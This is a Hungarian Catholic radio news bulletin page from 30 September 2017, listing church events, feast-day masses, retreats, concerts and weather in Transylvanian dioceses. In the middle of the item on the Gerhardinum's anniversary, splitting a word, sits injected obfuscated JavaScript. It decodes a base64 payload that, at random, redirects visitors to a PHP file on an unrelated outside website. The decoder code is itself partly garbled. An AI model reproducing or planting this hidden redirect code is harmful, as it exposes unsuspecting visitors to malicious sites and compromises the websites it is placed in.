2017. szeptember 30. – Hírek és programajánló

H Í R E K   E S T E

Örökös szentségimádási nap
A gyulafehérvári főegyházmegyében a holnapi nap folyamán Gyergyószentmiklóson a latin templomban tartják az örökös szentségimádási napot. Szánjunk időt a szentséglátogatásra, fejezzük ki ily módon is Krisztushoz való hűségünket és ragaszkodásunkat.

Szentségimádás Margittán és Sülelmeden
Október első vasárnapján, 2017. október 1-én a margittai Kistemplomban és Sülelmeden lesz a híveknek lehetősége az egyházmegye örökös szentségimádásába bekapcsolódni.

Szent Ferenc ünnepe
A gyulafehérvári főegyházmegyében a nagytusnádi templomban az ünnepi búcsús szentmisét október 1-én, holnap fél egy órától tartják, szentbeszédet mond Ilyés Zsolt csíkszentléleki plébános. Október 4-én, szerdán délután öt órakor, szintén búcsút ünnepelnek. A szentmise főcelebránsa Tamás József püspök, szónoka pedig Urbán Erik OFM a csíksomlyói kegytemplom igazgatója.
A csíksomlyói kegytemplomban október 3-án, kedden emlékeznek meg Assisi Szent Ferenc tranzitusáról, égbe költözéséről. Az ünnepi szentmise délután hat órakor kezdődik.
Assisi Szent Ferenc ünnepének előestéjén,  kedden Székelyudvarhelyen a ferencesek templomában a délután hat órakor kezdődő szentmise keretében emlékeznek meg Szent Ferenc elszenderüléséről, tranzitusáról.
A temesvári egyházmegyében a ferencfalvi templom búcsúját október 1-jén, holnap ünnepli a közösség. A délután három órakor kezdődő szentmisét Pál József Csaba főesperes, resicabányai plébános celebrálja.

Orvosok lelkigyakorlata Székelyudvarhelyen
2017. október 6–7. között a székelyudvarhelyi Szent Pio Lelkigyakorlatos Házban tartják az orvosok és orvostanhallgatók lelkigyakorlatát Orvos, gyógyítsd meg önmagad! címmel. A lelkigyakorlaton tanúságot tesz dr. Csókay András budapesti idegsebész főorvos és felesége, Daniella.
A lelkigyakorlat témája: Utunk a tékozló fiútól a jobb lator bűnbánatáig.
A részvételhez előzetes bejelentkezés szükséges, ennek határideje október 1. Bővebb információ a 0266 210 537-es és a 0755 489 743-as telefonszámokon, illetve a hazpio@gmail.com e-mail-címen.

Tanévnyitó ünnepség a Kolozsvári teológián
A Babeș-Bolyai Tudományegyetem Római Katolikus Teológia Karának tanévnyitó ünnepsége október 2-án, hétfőn délután hat órakor kezdődik a kar székhelyén, a Márton Áron teremben. Az évnyitót követően este hét órától a Szent Jeromos kápolnában tanévkezdő Veni Sancte szentmisét tartanak, mely egyben a kápolna búcsúünnepe is lesz.

Hétvégi szentmiseközvetítés
Holnap délelőtt tíz órától a hét plébániatemplomából, Kárásztelekről hallhatják a szentmisét.

Időjárás:Holnap már sok napsütésben lehet részünk, csapadék továbbra sem várható, és a légmozgás sem lesz jelentős. A hűvös hajnalt követően napközben 13-19 fok közé melegedhet a levegő. 

MRE – Hírszolgálat, 2017. szeptember 30.


H Í R E K   D É L B E N

Örökös szentségimádási nap
A gyulafehérvári főegyházmegyében a mai nap folyamán Abafáján tartják az örökös szentségimádási napot. Szánjunk időt a szentséglátogatásra, fejezzük ki ily módon is Krisztushoz való hűségünket és ragaszkodásunkat.

Előadás Resicabányán
Ma délután hat órától a Havas Boldogasszony plébánia nagytermében Dr. Valea Ernest tart előadást, amelynek témája az alternatív gyógyászat keresztény szemmel. Többek között a homeopátiáról, akupunktúráról, reiki kezelésről is szó lesz.

Idősek világnapja
Gyergyószentmiklóson október 1-én, vasárnap köszöntik a szépkorúakat. Az ünnepség holnap fél tizenegy órakor szentmisével kezdődik a Szent Miklós-plébániatemplomban, ahol felvehető a betegek szentsége, ezt követően a Korona teremeben folytatódik az esemény.
Szentegyházán szintén október 1-én, vasárnap ünneplik meg az idősek nemzetközi világnapját. A rendezvény délelőtt tíz órakor szentmisével kezdődik a helyi Jézus Szíve-plébániatemplomban, amelyet Szecsete László plébános mutat be. Ezt követi az agapé és az idősek megajándékozása.

Koncert Petrozsényban
Ma este fél héttől Orgona-Szaxofon koncertet tartanak Petrozsényban a Szent Borbála római katolikus templomban. Előadók Potyó István és Réman Zoltán. Várnak minden zenekedvelőt.

Rózsafüzér társulatok találkozója
Hidegségben október 1-én, holnap délelőtt tíz órakor kilencedik alkalommal találkoznak a rózsafüzér társulatok. Délelőtt tíz órától gyülekezés, majd a társulatok bemutatkozását követően szentségimádáson és szentmisén vesznek részt.

Szentségimádás Margittán és Sülelmeden
Október első vasárnapján, 2017. október 1-én a margittai Kistemplomban és Sülelmeden lesz a híveknek lehetősége az egyházmegye örökös szentségimádásába bekapcsolódni.

Figyelemfelkeltő előadás Csíkszeredában
Október elseje a mellrák elleni küzdelem világnapja. Mivel térségünkben is egyre gyakoribb ez a betegség, a szervezők fontosnak tartják, hogy minél szélesebb körű ismereteket szerezzenek a nők a megelőzésről, a szűrővizsgálatokról, a korai felismerésről, a gyógyítási lehetőségekről. Október 1-jén, holnap délelőtt tíz órai kezdettel Csíkszeredában, a Szt. Imre ifjúsági központban melldaganattal diagnosztizált nők egy csoportja figyelemfelkeltő előadást szervez ebben a témában szakorvos bevonásával. Az előadást kötetlen beszélgetéssel zárják, ahol a kérdéseiket is feltehetik. Várnak minden érdeklődőt.

Búcsúk Lisieux-i Kis Szent Teréz ünnepén
A gyulafehérvári főegyházmegyében, Székelyudvarhelyen
a Lisieux-i Kis Szent Teréz-plébániatemplom búcsúja holnap fél egy órakor kezdődik. A búcsú meghívott szónoka Székely Dénes kanonok, teológiai tanár Gyulafehérvárról. A vasárnap esti ifjúsági szentmise elmarad.
Marosszentgyörgyön, a Sarutlan Karmelita Nővérek holnap ünneplik kápolnájuk védőszentjét. Délután öt órától vesperást énekelnek, majd szentolvasót imádkoznak a hívekkel. A délután hat órakor kezdődő szentmise főcelebránsa Jakubinyi György érsek lesz, a homíliát Nagy László, nyárádselyei plébános mondja.
A temesvári egyházmegyében a Kis Szent Teréz tiszteletére felszentelt arad-ségai templomban holnap délelőtt fél tizenegy órától kezdődik a magyar, fél egytől pedig a román nyelvű búcsús szentmise. Mindkettő főcelebránsa és szónoka Kapor János temesvár-gyárvárosi plébános.
A nagyváradi egyházmegyében a Lisieux-i Kis Szent Teréz tiszteletére szentelt nagyvárad-őssi templom búcsús szentmiséjét holnap déli tizenkét órakor tartják.
A szatmári egyházmegyében a szatmárnémeti Pálfalvai úti templom titulusa szintén Kis Szent Teréz. Búcsúját holnap délelőtt tizenegy órától ünneplik.
 
Váradszöllősi Zenei Estek
A nagyváradi püspökség és a váradszöllősi plébánia közös szervezésében, orgonát és orgonamuzsikát népszerűsítő szándékkal folytatódik a tavaly elkezdett Váradszöllősi Zenei Estek címet viselő sorozat 2017. szeptember 17. – október 29. között, vasárnaponként este hét órai kezdettel a váradszöllősi plébániatemplomban.
A koncertsorozat fő célja az, hogy felhívja a figyelmet templomaink e fontos zenei, kulturális és művészi értékeket képviselő hangszerére, az orgonára. A koncertekre a belépés díjtalan, önkéntes adományokat köszönettel elfogadnak.

25 éves a Gerhardinum
A temesvári Gerhardinum Római Katolikus Teológiai Líceum idén ünnepli fennállásának 25 éves évfordulóját. Erről a jubileumról október 2-án, hétfőn reggel kilenc órától a temesvári Szent György székesegyházban tartfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andó ünnepi hálaadó szentmise és ünnepség keretén belül emlékeznek meg.

Magyar zarándoklat a radnai kegytemplomhoz
Szűz Mária, a Magyarok Nagyasszonya ünnepe alkalmából, október 7-én, szombaton a magyar nemzetiségű búcsújárók keresik fel a máriaradnai kegytemplomot. A délelőtt tizenegy órakor kezdődő ünnepi szentmisét bemutatja és szentbeszédet mond dr. Veres András győri megyés püspök, a Magyar Katolikus Püspöki Konferencia elnöke.

Időjárás: Folytatódik a nyugodt őszi idő, bár időnként felhők zavarhatják meg a napsütést. A  legtöbb napsütés északnyugaton várható. Gyenge, mérsékelt marad a szél. Hajnalban -3 és +5 fok közötti értékek voltak, délután pedig 13-18 fok között alakulhat a csúcshőmérséklet.

MRE - Hírszolgálat, 2017. szeptember 30.

About the author

maradmin

Leave a Comment